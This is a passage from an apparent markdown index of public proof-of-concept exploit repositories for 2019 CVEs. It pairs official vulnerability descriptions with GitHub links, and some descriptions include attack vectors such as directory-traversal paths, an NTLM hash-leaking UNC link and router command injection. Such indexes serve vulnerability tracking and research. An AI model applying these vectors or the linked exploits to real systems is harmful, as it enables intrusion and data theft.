[jas502n/CVE-2019-16759](https://github.com/jas502n/CVE-2019-16759) +- [theLSA/vbulletin5-rce](https://github.com/theLSA/vbulletin5-rce) +- [FarjaalAhmad/CVE-2019-16759](https://github.com/FarjaalAhmad/CVE-2019-16759) +- [andripwn/pwn-vbulletin](https://github.com/andripwn/pwn-vbulletin) +- [psychoxploit/vbull](https://github.com/psychoxploit/vbull) +- [polar1s7/CVE-2019-16759-bypass](https://github.com/polar1s7/CVE-2019-16759-bypass) +- [nako48/CVE-2019-16759](https://github.com/nako48/CVE-2019-16759) +- [0xdims/CVE-2019-16759](https://github.com/0xdims/CVE-2019-16759) +- [sunian19/CVE-2019-16759](https://github.com/sunian19/CVE-2019-16759) +- [ludy-dev/vBulletin_Routestring-RCE](https://github.com/ludy-dev/vBulletin_Routestring-RCE) +- [fxp0-4tx/CVE-2019-16759](https://github.com/fxp0-4tx/CVE-2019-16759) + +### CVE-2019-16784 (2020-01-14) + +In PyInstaller before version 3.6, only on Windows, a local privilege escalation vulnerability is present in this particular case: If a software using PyInstaller in "onefile" mode is launched by a privileged user (at least more than the current one) which have his "TempPath" resolving to a world writable directory. This is the case for example if the software is launched as a service or as a scheduled task using a system account (TempPath will be C:\Windows\Temp). In order to be exploitable the software has to be (re)started after the attacker launch the exploit program, so for a service launched at startup, a service restart is needed (e.g. after a crash or an upgrade). + + +- [AlterSolutions/PyInstallerPrivEsc](https://github.com/AlterSolutions/PyInstallerPrivEsc) +- [Ckrielle/CVE-2019-16784-POC](https://github.com/Ckrielle/CVE-2019-16784-POC) + +### CVE-2019-16889 (2019-09-25) + +Ubiquiti EdgeMAX devices before 2.0.3 allow remote attackers to cause a denial of service (disk consumption) because *.cache files in /var/run/beaker/container_file/ are created when providing a valid length payload of 249 characters or fewer to the beaker.session.id cookie in a GET header. The attacker can use a long series of unique session IDs. + + +- [grampae/CVE-2019-16889-poc](https://github.com/grampae/CVE-2019-16889-poc) + +### CVE-2019-16920 (2019-09-27) + +Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. + + +- [eniac888/CVE-2019-16920-MassPwn3r](https://github.com/eniac888/CVE-2019-16920-MassPwn3r) + +### CVE-2019-16941 (2019-09-28) + +NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document. This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call). + + +- [purpleracc00n/CVE-2019-16941](https://github.com/purpleracc00n/CVE-2019-16941) + +### CVE-2019-17026 (2020-03-02) + +Incorrect alias information in IonMonkey JIT compiler for setting array elements could lead to a type confusion. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 68.4.1, Thunderbird < 68.4.1, and Firefox < 72.0.1. + + +- [maxpl0it/CVE-2019-17026-Exploit](https://github.com/maxpl0it/CVE-2019-17026-Exploit) +- [lsw29475/CVE-2019-17026](https://github.com/lsw29475/CVE-2019-17026) + +### CVE-2019-17041 (2019-10-07) + +An issue was discovered in Rsyslog v8.1908.0. contrib/pmaixforwardedfrom/pmaixforwardedfrom.c has a heap overflow in the parser for AIX log messages. The parser tries to locate a log message delimiter (in this case, a space or a colon) but fails to account for strings that do not satisfy this constraint. If the string does not match, then the variable lenMsg will reach the value zero and will skip the sanity check that detects invalid log messages. The message will then be considered valid, and the parser will eat up the nonexistent colon delimiter. In doing so, it will decrement lenMsg, a signed integer, whose value was zero and now becomes minus one. The following step in the parser is to shift left the contents of the message. To do this, it will call memmove with the right pointers to the target and destination strings, but the lenMsg will now be interpreted as a huge value, causing a heap overflow. + + +- [Resery/CVE-2019-17041](https://github.com/Resery/CVE-2019-17041) + +### CVE-2019-17080 (2019-10-02) + +mintinstall (aka Software Manager) 7.9.9 for Linux Mint allows code execution if a REVIEWS_CACHE file is controlled by an attacker, because an unpickle occurs. This is resolved in 8.0.0 and backports. + + +- [Andhrimnirr/Mintinstall-object-injection](https://github.com/Andhrimnirr/Mintinstall-object-injection) +- [materaj2/Mintinstall-object-injection](https://github.com/materaj2/Mintinstall-object-injection) + +### CVE-2019-17124 (2019-10-09) + +Kramer VIAware 2.5.0719.1034 has Incorrect Access Control. + + +- [hessandrew/CVE-2019-17124](https://github.com/hessandrew/CVE-2019-17124) + +### CVE-2019-17137 (2020-02-10) + +This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR AC1200 R6220 Firmware version 1.1.0.86 Smart WiFi Router. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of path strings. By inserting a null byte into the path, the user can skip most authentication checks. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-8616. + + +- [vncloudsco/CVE-2019-17137](https://github.com/vncloudsco/CVE-2019-17137) + +### CVE-2019-17147 (2020-01-07) + +This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-LINK TL-WR841N routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 80 by default. When parsing the Host request header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length static buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-8457. + + +- [DrmnSamoLiu/CVE-2019-17147_Practice_Material](https://github.com/DrmnSamoLiu/CVE-2019-17147_Practice_Material) + +### CVE-2019-17195 (2019-10-15) + +Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass. + + +- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021) + +### CVE-2019-17221 (2019-11-05) + +PhantomJS through 2.1.1 has an arbitrary file read vulnerability, as demonstrated by an XMLHttpRequest for a file:// URI. The vulnerability exists in the page.open() function of the webpage module, which loads a specified URL and calls a given callback. An attacker can supply a specially crafted HTML file, as user input, that allows reading arbitrary files on the filesystem. For example, if page.render() is the function callback, this generates a PDF or an image of the targeted file. NOTE: this product is no longer developed. + + +- [h4ckologic/CVE-2019-17221](https://github.com/h4ckologic/CVE-2019-17221) + +### CVE-2019-17225 (2019-10-06) + +Subrion 4.2.1 allows XSS via the panel/members/ Username, Full Name, or Email field, aka an "Admin Member JSON Update" issue. + + +- [hacker625/CVE-2019-17225](https://github.com/hacker625/CVE-2019-17225) + +### CVE-2019-17234 (2019-11-12) + +includes/class-coming-soon-creator.php in the igniteup plugin through 3.4 for WordPress allows unauthenticated arbitrary file deletion. + + +- [administra1tor/CVE-2019-17234b-Exploit](https://github.com/administra1tor/CVE-2019-17234b-Exploit) + +### CVE-2019-17240 (2019-10-06) + +bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers. + + +- [pingport80/CVE-2019-17240](https://github.com/pingport80/CVE-2019-17240) +- [LucaReggiannini/Bludit-3-9-2-bb](https://github.com/LucaReggiannini/Bludit-3-9-2-bb) +- [triple-octopus/Bludit-CVE-2019-17240-Fork](https://github.com/triple-octopus/Bludit-CVE-2019-17240-Fork) +- [ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass](https://github.com/ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass) +- [jayngng/bludit-CVE-2019-17240](https://github.com/jayngng/bludit-CVE-2019-17240) +- [brunosergi/bloodit](https://github.com/brunosergi/bloodit) +- [spyx/cve-2019-17240](https://github.com/spyx/cve-2019-17240) +- [mind2hex/CVE-2019-17240](https://github.com/mind2hex/CVE-2019-17240) + +### CVE-2019-17382 (2019-10-09) + +An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. + + +- [K3ysTr0K3R/CVE-2019-17382-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-17382-EXPLOIT) + +### CVE-2019-17424 (2019-10-22) + +A stack-based buffer overflow in the processPrivilage() function in IOS/process-general.c in nipper-ng 0.11.10 allows remote attackers (serving firewall configuration files) to achieve Remote Code Execution or Denial Of Service via a crafted file. + + +- [mavlevin/CVE-2019-17424](https://github.com/mavlevin/CVE-2019-17424) + +### CVE-2019-17427 (2019-10-10) + +In Redmine before 3.4.11 and 4.0.x before 4.0.4, persistent XSS exists due to textile formatting errors. + + +- [RealLinkers/CVE-2019-17427](https://github.com/RealLinkers/CVE-2019-17427) + +### CVE-2019-17495 (2019-10-10) + +A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method. + + +- [SecT0uch/CVE-2019-17495-test](https://github.com/SecT0uch/CVE-2019-17495-test) + +### CVE-2019-17497 (2019-10-10) + +Tracker PDF-XChange Editor before 8.0.330.0 has an NTLM SSO hash theft vulnerability using crafted FDF or XFDF files (a related issue to CVE-2018-4993). For example, an NTLM hash is sent for a link to \\192.168.0.2\C$\file.pdf without user interaction. + + +- [JM-Lemmi/cve-2019-17497](https://github.com/JM-Lemmi/cve-2019-17497) + +### CVE-2019-17498 (2019-10-21) + +In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. + + +- [Timon-L/3007Project](https://github.com/Timon-L/3007Project) + +### CVE-2019-17513 (2019-10-18) + +An issue was discovered in Ratpack before 1.7.5. Due to a misuse of the Netty library class DefaultHttpHeaders, there is no validation that headers lack HTTP control characters. Thus, if untrusted data is used to construct HTTP headers with Ratpack, HTTP Response Splitting can occur. + + +- [epicosy/Ratpack-1](https://github.com/epicosy/Ratpack-1) + +### CVE-2019-17525 (2020-04-21) + +The login page on D-Link DIR-615 T1 20.10 devices allows remote attackers to bypass the CAPTCHA protection mechanism and conduct brute-force attacks. + + +- [huzaifahussain98/CVE-2019-17525](https://github.com/huzaifahussain98/CVE-2019-17525) + +### CVE-2019-17558 (2019-12-30) + +Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). + + +- [thelostworldFree/CVE-2019-17558_Solr_Vul_Tool](https://github.com/thelostworldFree/CVE-2019-17558_Solr_Vul_Tool) +- [zhzyker/exphub](https://github.com/zhzyker/exphub) +- [Ma1Dong/Solr_CVE-2019-17558](https://github.com/Ma1Dong/Solr_CVE-2019-17558) +- [xkyrage/Exploit_CVE-2019-17558-RCE](https://github.com/xkyrage/Exploit_CVE-2019-17558-RCE) + +### CVE-2019-17564 (2020-04-01) + +Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions. + + +- [r00t4dm/CVE-2019-17564](https://github.com/r00t4dm/CVE-2019-17564) +- [Jaky5155/CVE-2019-17564](https://github.com/Jaky5155/CVE-2019-17564) +- [Hu3sky/CVE-2019-17564](https://github.com/Hu3sky/CVE-2019-17564) +- [Exploit-3389/CVE-2019-17564](https://github.com/Exploit-3389/CVE-2019-17564) +- [Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget](https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget) +- [fairyming/CVE-2019-17564](https://github.com/fairyming/CVE-2019-17564) + +### CVE-2019-17570 (2020-01-23) + +An untrusted deserialization was found in the org.apache.xmlrpc.parser.XmlRpcResponseParser:addResult method of Apache XML-RPC (aka ws-xmlrpc) library. A malicious XML-RPC server could target a XML-RPC client causing it to execute arbitrary code. Apache XML-RPC is no longer maintained and this issue will not be fixed. + + +- [r00t4dm/CVE-2019-17570](https://github.com/r00t4dm/CVE-2019-17570) +- [slowmistio/xmlrpc-common-deserialization](https://github.com/slowmistio/xmlrpc-common-deserialization) + +### CVE-2019-17571 (2019-12-20) + +Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17. + + +- [shadow-horse/CVE-2019-17571](https://github.com/shadow-horse/CVE-2019-17571) +- [Al1ex/CVE-2019-17571](https://github.com/Al1ex/CVE-2019-17571) +- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder) + +### CVE-2019-17596 (2019-10-24) + +Go before 1.12.11 and 1.3.x before 1.13.2 can panic upon an attempt to process network traffic containing an invalid DSA public key. There are several attack scenarios, such as traffic from a client to a server that verifies client certificates. + + +- [pquerna/poc-dsa-verify-CVE-2019-17596](https://github.com/pquerna/poc-dsa-verify-CVE-2019-17596) + +### CVE-2019-17621 (2019-12-30) + +The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network. + + +- [Squirre17/CVE-2019-17621](https://github.com/Squirre17/CVE-2019-17621) + +### CVE-2019-17625 (2019-10-16) + +There is a stored XSS in Rambox 0.6.9 that can lead to code execution. The XSS is in the name field while adding/editing a service. The problem occurs due to incorrect sanitization of the name field when being processed and stored. This allows a user to craft a payload for Node.js and Electron, such as an exec of OS commands within the onerror attribute of an IMG element. + + +- [Ekultek/CVE-2019-17625](https://github.com/Ekultek/CVE-2019-17625) + +### CVE-2019-17633 (2019-12-19) + +For Eclipse Che versions 6.16 to 7.3.0, with both authentication and TLS disabled, visiting a malicious web site could trigger the start of an arbitrary Che workspace. Che with no authentication and no TLS is not usually deployed on a public network but is often used for local installations (e.g. on personal laptops). In that case, even if the Che API is not exposed externally, some javascript running in the local browser is able to send requests to it. + + +- [mgrube/CVE-2019-17633](https://github.com/mgrube/CVE-2019-17633) + +### CVE-2019-17638 (2020-07-09) + +In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with other data. Thread1 then proceeds to write the buffer that now contains different data. This results in client1, which issued request1 seeing data from another request or response which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.). If the Jetty version cannot be upgraded, the vulnerability can be significantly reduced by configuring a responseHeaderSize significantly larger than the requestHeaderSize (12KB responseHeaderSize and 8KB requestHeaderSize). + + +- [forse01/CVE-2019-17638-Jetty](https://github.com/forse01/CVE-2019-17638-Jetty) + +### CVE-2019-17658 (2020-03-12) + +An unquoted service path vulnerability in the FortiClient FortiTray component of FortiClientWindows v6.2.2 and prior allow an attacker to gain elevated privileges via the FortiClientConsole executable service path. + + +- [Ibonok/CVE-2019-17658](https://github.com/Ibonok/CVE-2019-17658) + +### CVE-2019-17662 (2019-10-16) + +ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. + + +- [MuirlandOracle/CVE-2019-17662](https://github.com/MuirlandOracle/CVE-2019-17662) +- [kxisxr/Bash-Script-CVE-2019-17662](https://github.com/kxisxr/Bash-Script-CVE-2019-17662) +- [whokilleddb/CVE-2019-17662](https://github.com/whokilleddb/CVE-2019-17662) +- [rajendrakumaryadav/CVE-2019-17662-Exploit](https://github.com/rajendrakumaryadav/CVE-2019-17662-Exploit) +- [Tamagaft/CVE-2019-17662](https://github.com/Tamagaft/CVE-2019-17662) +- [bl4ck574r/CVE-2019-17662](https://github.com/bl4ck574r/CVE-2019-17662) +- [thomas-osgood/CVE-2019-17662](https://github.com/thomas-osgood/CVE-2019-17662) +- [medarov411/vnc-lab-cve-2019-17662](https://github.com/medarov411/vnc-lab-cve-2019-17662) + +### CVE-2019-17666 (2019-10-17) + +rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow. + + +- [uthrasri/CVE-2019-17666](https://github.com/uthrasri/CVE-2019-17666) + +### CVE-2019-17671 (2019-10-17) + +In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled. + + +- [rhbb/CVE-2019-17671](https://github.com/rhbb/CVE-2019-17671) + +### CVE-2019-18276 (2019-11-28) + +An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected. + + +- [M-ensimag/CVE-2019-18276](https://github.com/M-ensimag/CVE-2019-18276) +- [SABI-Ensimag/CVE-2019-18276](https://github.com/SABI-Ensimag/CVE-2019-18276) + +### CVE-2019-18370 (2019-10-23) + +An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress, so one can control the contents of the files in the decompressed directory. In addition, the application's sh script for testing upload and download speeds reads a URL list from /tmp/speedtest_urls.xml, and there is a command injection vulnerability, as demonstrated by api/xqnetdetect/netspeed. + + +- [FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis](https://github.com/FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis) + +### CVE-2019-18371 (2019-10-23) + +An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication. + + +- [UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC) +- [AjayMT6/UltramanGaia](https://github.com/AjayMT6/UltramanGaia) +- [jsnhcuan1997/UltramanGaia](https://github.com/jsnhcuan1997/UltramanGaia) + +### CVE-2019-18426 (2020-01-21) + +A vulnerability in WhatsApp Desktop versions prior to 0.3.9309 when paired with WhatsApp for iPhone versions prior to 2.20.10 allows cross-site scripting and local file reading. Exploiting the vulnerability requires the victim to click a link preview from a specially crafted text message. + + +- [PerimeterX/CVE-2019-18426](https://github.com/PerimeterX/CVE-2019-18426) + +### CVE-2019-18634 (2020-01-29) + +In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c. + + +- [Plazmaz/CVE-2019-18634](https://github.com/Plazmaz/CVE-2019-18634) +- [saleemrashid/sudo-cve-2019-18634](https://github.com/saleemrashid/sudo-cve-2019-18634) +- [N1et/CVE-2019-18634](https://github.com/N1et/CVE-2019-18634) +- [ptef/CVE-2019-18634](https://github.com/ptef/CVE-2019-18634) +- [edsonjt81/sudo-cve-2019-18634](https://github.com/edsonjt81/sudo-cve-2019-18634) +- [paras1te-x/CVE-2019-18634](https://github.com/paras1te-x/CVE-2019-18634) +- [aesophor/CVE-2019-18634](https://github.com/aesophor/CVE-2019-18634) +- [TheJoyOfHacking/saleemrashid-sudo-cve-2019-18634](https://github.com/TheJoyOfHacking/saleemrashid-sudo-cve-2019-18634) +- [DDayLuong/CVE-2019-18634](https://github.com/DDayLuong/CVE-2019-18634) +- [chanbakjsd/CVE-2019-18634](https://github.com/chanbakjsd/CVE-2019-18634) + +### CVE-2019-18655 (2019-11-12) + +File Sharing Wizard version 1.5.0 build 2008 is affected by a Structured Exception Handler based buffer overflow vulnerability. An unauthenticated attacker is able to perform remote command execution and obtain a command shell by sending a HTTP GET request including the malicious payload in the URL. A similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331. + + +- [0xhuesca/CVE-2019-18655](https://github.com/0xhuesca/CVE-2019-18655) + +### CVE-2019-18683 (2019-11-04) + +An issue was discovered in drivers/media/platform/vivid in the Linux kernel through 5.3.8. It is exploitable for privilege escalation on some Linux distributions where local users have /dev/video0 access, but only if the driver happens to be loaded. There are multiple race conditions during streaming stopping in this driver (part of the V4L2 subsystem). These issues are caused by wrong mutex locking in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), sdr_cap_stop_streaming(), and the corresponding kthreads. At least one of these race conditions leads to a use-after-free. + + +- [sanjana123-cloud/CVE-2019-18683](https://github.com/sanjana123-cloud/CVE-2019-18683) +- [Limesss/cve-2019-18683](https://github.com/Limesss/cve-2019-18683) + +### CVE-2019-18818 (2019-11-07) + +strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + + +- [guglia001/CVE-2019-18818](https://github.com/guglia001/CVE-2019-18818) +- [rasyidfox/CVE-2019-18818](https://github.com/rasyidfox/CVE-2019-18818) +- [hadrian3689/strapi_cms_3.0.0-beta.17.7](https://github.com/hadrian3689/strapi_cms_3.0.0-beta.17.7) +- [Hackhoven/Strapi-RCE](https://github.com/Hackhoven/Strapi-RCE) + +### CVE-2019-18845 (2019-11-09) + +The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection. + + +- [fengjixuchui/CVE-2019-18845](https://github.com/fengjixuchui/CVE-2019-18845) + +### CVE-2019-18873 (2019-11-12) + +FUDForum 3.0.9 is vulnerable to Stored XSS via the User-Agent HTTP header. This may result in remote code execution. An attacker can use a user account to fully compromise the system via a GET request. When the admin visits user information under "User Manager" in the control panel, the payload will execute. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. The problem is in admsession.php and admuser.php. + + +- [fuzzlove/FUDforum-XSS-RCE](https://github.com/fuzzlove/FUDforum-XSS-RCE) + +### CVE-2019-18885 (2019-11-14) + +fs/btrfs/volumes.c in the Linux kernel before 5.1 allows a btrfs_verify_dev_extents NULL pointer dereference via a crafted btrfs image because fs_devices->devices is mishandled within find_device, aka CID-09ba3bc9dd15. + + +- [bobfuzzer/CVE-2019-18885](https://github.com/bobfuzzer/CVE-2019-18885) + +### CVE-2019-18890 (2019-11-21) + +A SQL injection vulnerability in Redmine through 3.2.9 and 3.3.x before 3.3.10 allows Redmine users to access protected information via a crafted object query. + + +- [RealLinkers/CVE-2019-18890](https://github.com/RealLinkers/CVE-2019-18890) + +### CVE-2019-18935 (2019-12-11) + +Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.) + + +- [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto) +- [noperator/CVE-2019-18935](https://github.com/noperator/CVE-2019-18935) +- [becrevex/Telerik_CVE-2019-18935](https://github.com/becrevex/Telerik_CVE-2019-18935) +- [ThanHuuTuan/Telerik_CVE-2019-18935](https://github.com/ThanHuuTuan/Telerik_CVE-2019-18935) +- [ThanHuuTuan/CVE_2019_18935](https://github.com/ThanHuuTuan/CVE_2019_18935) +- [murataydemir/CVE-2019-18935](https://github.com/murataydemir/CVE-2019-18935) +- [appliedi/Telerik_CVE-2019-18935](https://github.com/appliedi/Telerik_CVE-2019-18935) +- [random-robbie/CVE-2019-18935](https://github.com/random-robbie/CVE-2019-18935) +- [0xAgun/CVE-2019-18935-checker](https://github.com/0xAgun/CVE-2019-18935-checker) +- [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation) +- [dust-life/CVE-2019-18935-memShell](https://github.com/dust-life/CVE-2019-18935-memShell) + +### CVE-2019-18988 (2020-02-07) + +TeamViewer Desktop through 14.7.1965 allows a bypass of remote-login access control because the same key is used for different customers' installations. It used a shared AES key for all installations since at least as far back as v7.0.43148, and used it for at least OptionsPasswordAES in the current version of the product. If an attacker were to know this key, they could decrypt protect information stored in the registry or configuration files of TeamViewer. With versions before v9.x , this allowed for attackers to decrypt the Unattended Access password to the system (which allows for remote login to the system as well as headless file browsing). The latest version still uses the same key for OptionPasswordAES but appears to have changed how the Unattended Access password is stored. While in most cases an attacker requires an existing session on a system, if the registry/configuration keys were stored off of the machine (such as in a file share or online), an attacker could then decrypt the required password to login to the system. + + +- [reversebrain/CVE-2019-18988](https://github.com/reversebrain/CVE-2019-18988) +- [mr-r3b00t/CVE-2019-18988](https://github.com/mr-r3b00t/CVE-2019-18988) + +### CVE-2019-19012 (2019-11-16) + +An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read, in which the offset of this read is under the control of an attacker. (This only affects the 32-bit compiled version). Remote attackers can cause a denial-of-service or information disclosure, or possibly have unspecified other impact, via a crafted regular expression. + + +- [ManhNDd/CVE-2019-19012](https://github.com/ManhNDd/CVE-2019-19012) +- [tarantula-team/CVE-2019-19012](https://github.com/tarantula-team/CVE-2019-19012) + +### CVE-2019-19030 (2022-12-26) + +Cloud Native Computing Foundation Harbor before 1.10.3 and 2.x before 2.0.1 allows resource enumeration because unauthenticated API calls reveal (via the HTTP status code) whether a resource exists. + + +- [shodanwashere/boatcrash](https://github.com/shodanwashere/boatcrash) + +### CVE-2019-19033 (2019-11-21) + +Jalios JCMS 10 allows attackers to access any part of the website and the WebDAV server with administrative privileges via a backdoor account, by using any username and the hardcoded dev password. + + +- [ricardojoserf/CVE-2019-19033](https://github.com/ricardojoserf/CVE-2019-19033) + +### CVE-2019-19194 (2020-02-12) + +The Bluetooth Low Energy Secure Manager Protocol (SMP) implementation on Telink Semiconductor BLE SDK versions before November 2019 for TLSR8x5x through 3.4.0, TLSR823x through 1.3.0, and TLSR826x through 3.3 devices installs a zero long term key (LTK) if an out-of-order link-layer encryption request is received during Secure Connections pairing. An attacker in radio range can have arbitrary read/write access to protected GATT service data, cause a device crash, or possibly control a device's function by establishing an encrypted session with the zero LTK. + + +- [louisabricot/writeup-cve-2019-19194](https://github.com/louisabricot/writeup-cve-2019-19194) + +### CVE-2019-19203 (2019-11-21) + +An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read. + + +- [ManhNDd/CVE-2019-19203](https://github.com/ManhNDd/CVE-2019-19203) +- [tarantula-team/CVE-2019-19203](https://github.com/tarantula-team/CVE-2019-19203) + +### CVE-2019-19204 (2019-11-21) + +An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND. This leads to a heap-based buffer over-read. + + +- [ManhNDd/CVE-2019-19204](https://github.com/ManhNDd/CVE-2019-19204) +- [tarantula-team/CVE-2019-19204](https://github.com/tarantula-team/CVE-2019-19204) + +### CVE-2019-19231 (2019-12-20) + +An insecure file access vulnerability exists in CA Client Automation 14.0, 14.1, 14.2, and 14.3 Agent for Windows that can allow a local attacker to gain escalated privileges. + + +- [hessandrew/CVE-2019-19231](https://github.com/hessandrew/CVE-2019-19231) + +### CVE-2019-19268 +- [TheCyberGeek/CVE-2019-19268](https://github.com/TheCyberGeek/CVE-2019-19268) + +### CVE-2019-19315 (2019-12-17) + +NLSSRV32.EXE in Nalpeiron Licensing Service 7.3.4.0, as used with Nitro PDF and other products, allows Elevation of Privilege via the \\.\mailslot\nlsX86ccMailslot mailslot. + + +- [monoxgas/mailorder](https://github.com/monoxgas/mailorder) + +### CVE-2019-19356 (2020-02-07) + +Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing. + + +- 